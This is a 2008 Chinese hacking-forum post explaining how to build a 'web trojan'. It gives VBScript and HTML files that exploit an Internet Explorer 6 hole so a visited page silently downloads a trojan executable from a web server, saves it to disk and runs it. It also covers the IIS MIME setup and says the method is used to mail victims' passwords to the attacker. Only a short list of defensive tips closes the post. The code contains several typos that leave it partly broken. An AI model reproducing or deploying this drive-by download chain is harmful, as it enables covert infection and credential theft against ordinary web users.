蓝色动力网络

 找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

查看: 4051|回复: 0

网页木马制作讲解

[复制链接]
发表于 2008-8-18 08:38:07 | 显示全部楼层 |阅读模式
我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.

首先我们需要编写几个简单的文件

一、名字为abc.abc的文件


<html>
<script language="vbscript">
Function HttpDoGet(url)
     set oReq = CreateObject("Microsoft.XMLHTTP")
     oReq.open "GET",url,false
     oReq.send
     If oReq.status=200 then
            HttpDoGet=oReq.respomseBody
            Savefile HttpDoGet,"c:\win.exe"
     End If
     Set oReq=nothing
End Function
sub SaveFile(str.fName)
     Set objStream = CreateObject("ADODB.Stream")
     objStream.Type =1
     objStream.Open
     objStream.write str
     objStream.SaveToFile fName.2
     objStream.Close()
     set objStream = nothing
     exewin()
End sub
Sub exewin()
     set wshshell=createobject ("wscript.shell" )
     a=wshshell.run ("cmd.exe /c c:\win.exe",0)
     b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
     window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>

其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。

二、名字为test.htm的文件

<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="http://127.0.0.1/win.test";;;></object>
</body></html>

三、名字为win.test的文件


<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
     set oReq = CreateObject("Microsoft.XMLHTTP")
     oReq.open "GET",url,false
     oReq.send
     If oReq.status=200 then
            HttpDoGet,"c:\win.hta"
            Set oReq=nothing
     End if
end function
sub SaveFile(str,fName)
     Dim fso, tf
     S e t      f s o      =      C r e a t e O b j e c t(Scripting.FileSystemObject")
     Set tf = fso.CreateTextfile(fName,True)
     tf.Write str
     tf.Close
     exewin()
End sub
Sub exewin()
     set wshshell=createobject ("wscript.shell" )
     a=wshshell.run ("cmd.exe /c c:\win.hat",0)
     window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>
四、名字为test.exe的木马程序。

晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。

服务器的文件列表
test.htm:对外发布的网页
win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。
abc.abc下载二进制的木马文件test.exe,并执行。
test.exe:木马程序。

上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!

最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。

有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了

看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,
A、安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B、不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C、不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D、不随便打开和预览有附件的邮件。
E、安装防火墙和杀毒软件的最新版本,经常进行升级和查毒。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

蓝色动力网络微信平台
网站管理,业务合作联系邮箱: admin#lansedongli.com    QQ:13412492 限网站业务问题.
网站帐号、密码、密保找回请使用注册邮箱,发送邮件至 password#lansedongli.com ,否则不予受理.
免责声明:本论坛所有文字和图片仅代表其个人观点.
本站某些资料或文章来自于互联网,不代表本站观点,如果侵犯了您的权益,请来信告知,我们会在三天内删除.
为了给大家一个更好的交流场所,请勿在本论坛发表与中华人民共和国法律相抵触的言论,请合作,谢谢!
Copyright © 2007-2019 Corporation Powered by网吧系统 版权所有    转载请注明!
浙ICP备11043737号-1 程序:Discuz! x3.4

湘公网安备 43018102000145号

手机版|Archiver|蓝色动力网络   

快速回复 返回顶部 返回列表